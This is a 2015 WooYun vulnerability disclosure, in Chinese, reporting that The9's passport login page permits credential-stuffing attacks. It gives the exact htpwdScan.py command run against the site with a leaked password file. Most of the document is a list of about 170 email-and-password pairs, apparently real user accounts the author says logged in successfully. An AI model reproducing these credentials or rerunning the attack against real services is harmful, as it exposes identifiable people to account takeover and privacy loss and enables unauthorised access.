漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0110115
漏洞标题:第九城市某处可被用于撞库攻击(已验证可登录)
相关厂商:第九城市
漏洞作者: 路人甲
提交时间:2015-04-27 15:39
修复时间:2015-05-02 15:40
公开时间:2015-05-02 15:40
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-27: 细节已通知厂商并且等待厂商处理中
2015-05-02: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
第九城市某处可被用于撞库攻击(验证已登录)
详细说明:
还是借助lijiejie的神器跑了一下
htpwdScan.py -f=C:\Users\Administrator\Desktop\post.txt -https -database loginname,pwd=D:\data\kuzi.txt -regex="([^-]*)----([^-]*)" -err="error" -suc="success" -fip
https://passport.the9.com/index.php
漏洞证明:
一共跑出来了300个账号 这里贴出一部分和登录截图证明
wxz78456@163.com 740817
zcllypeng@163.com zhou0214
kk1988728@163.com 19900820
ywshuaigg@163.com feifei
tg0204@163.com jk2001
ft2422058@163.com 5200748
guitarwj@163.com 211314
hh_xuf@163.com 12031203
yaqi0631@163.com 5213344
aofurcjstk@163.com 1985514
jfr728264@163.com jfr2233456
libo98118@163.com 1q2w3e4r
165225452@163.com 198622
zsh877@163.com 666163
c64485448@163.com c89526246
zhuhaijian89@163.com 90110598
lilu19840111@163.com 8411064518
zjh221@163.com 06042210
djmixmusic@163.com cm19850227
zhengdiange@163.com 5635616
qianhoho@163.com qiangma
zhenlongj@163.com long1128
haige6686@163.com 19691002
inlty520@163.com 5201573
victorwuwh@163.com oo7wwh
yutao8871@163.com yutao7525339
51330606@163.com woaini
wangshutie@163.com wangxia521
shenxi117@163.com yufan117
lizhou8899@163.com a81288328
q309331692@163.com 123qweasd
jia2326@163.com 198703210
jy01295475@163.com 2732392li
ji84520@163.com dengjiwen
yangmin154@163.com 6361162
qq34332202@163.com 34332202
tianjie456@163.com a456456
wazl887@163.com w123456
awerqd@163.com 19820506
killrt@163.com dundao
xjlovedy@163.com hdy5201314
zhangzhi412@163.com zhang412
zhushuai83@163.com demon1983
125965781@163.com 19881026
cappnnio002@163.com sunbin945
s419824574@163.com woaini1711
fuz0520@163.com 19890520
ghmming@163.com ghm122411
fanbin_2009@163.com 100306
suzhenjunnan@163.com s3981627
a7825412@163.com 78254120
liehaoabcd@163.com abcd1988917
songxs4761@163.com sxs022573
haoran5241@163.com 831024
hbq200w@163.com qqwwee88
kgdapstfl@163.com 001026
starlight407@163.com 13770927215
wk99123987@163.com wk19871031
yanglijia2000@163.com 1982418
fp1203@163.com baichi123
lsp331lsp@163.com 19801003
a410a014@163.com a85221913
yesilin456@163.com as6990105
hcttmail@163.com 801105
gcb110120@163.com 7758258
aqtc_dzq@163.com danziqi0918
huangchaoxuhao@163.com f19911225
ak198431@163.com 198431
shaojialaojiu@163.com ww3333
wtang1@163.com 5752821
gs429799@163.com 19880818
zsqwyq@163.com 1985110
fu19860412@163.com 652301ses
lb2002982@163.com qmzqleo123
chldudrns@163.com cuiyongjun
gaoqiaoqq@163.com huang9413
ainiguangzhe@163.com 12341234
zzq472824862@163.com zzq19940
bladelongs@163.com liujie2008
belejc@163.com zjb813627
aaa1215abcd@163.com 1215abcd
geaohao@163.com jk11111
xiaogui495@163.com 19850926x
wo68018@163.com cjj123
yuhw15@163.com yu1994hw
wbwjysu5@163.com woaini1
ycls8808@163.com 6388808
aimeng1028@163.com a123456
zd2007148111@163.com 581859dong
xsy519915123@163.com 004263
liuqian0531@163.com liuqian520
aosi890@163.com a123456
liuhua147@163.com liuhua028
zhannimahao2@163.com c19820501
lizhicun_1@163.com zaq1zaq1
8wy202017@163.com 5262235
qqq3130302@163.com 3130302
guanshanhaoyue@163.com fzqkxeqm
xiaohan8862@163.com 5265528aa
lucxswq1@163.com a123456
stateqwe@163.com 123qwe456
yjg1994123@163.com 1994123
msqcg@163.com dwtmsqcg
opjk132@163.com 7796543
zjcxzasdewq33@163.com wangchao2
li378058690@163.com 19700731
a549184126@163.com 830621
lg46501@163.com 5812332
q6300204@163.com 6300204
zjacj521@163.com 6685127
yanbo0409@163.com 7174119
zy783140@163.com zjane114
q421277431@163.com 530399756
g998165453@163.com 1975409
jeansphoebe@163.com zyd830711
dd8857@163.com swd123
zhaodan122526@163.com 122526
toyou542@163.com yjg8314437
majinjin2010@163.com ma89400598
cwjalsy@163.com cwj1314
gj1941@163.com 528718
jml2004520@163.com 8330658
shadower01@163.com w5871582
fuzhi1314@163.com fz25923236
sdy8sdy@163.com 741000
ttco1127@163.com 7788520
gw6623667@163.com 6824226
wjfxdx@163.com 7891116
zhou88775665@163.com abc12564
okm196@163.com 963963a
jisw7788@163.com qhcke23
smpatw@163.com 1994730
a3213728@163.com 3213728
zj7487@163.com 19820214
jy804132@163.com 19851112
feng123466@163.com 123466
sooyii123@163.com a88426130
a874332991@163.com a19931218
a1188519182@163.com zhang5418
zhangxin42@163.com 19831207
912984869@163.com 13797478456
sijunzheng@163.com 5775776
qq632009559@163.com qq1234567
tu_kh2@163.com 1996429
zheb18@163.com 188127
flager123@163.com 1qaz2wsx
hwchao19890624@163.com 890624
roobin0909@163.com c3df32ea
nsldm@163.com 19811222
ywpc286@163.com ywppc286
37481018@163.com 19821018
giugiu001@163.com 20010506
zyqkdczz@163.com 007741
xwxw725@163.com 8878520
sawds5328@163.com a2211211
hefei8868@163.com hefei520
shuaixu1007@163.com yangmi5200
a566131711@163.com 1325820142
lxx030609@163.com qwe987654321
jiangbaox@163.com 5234137
tianlan077@163.com z1234567
wqertrt54987@163.com 123qwe123
gps330@163.com aptx4869
修复方案:
加强验证
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-05-02 15:40
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无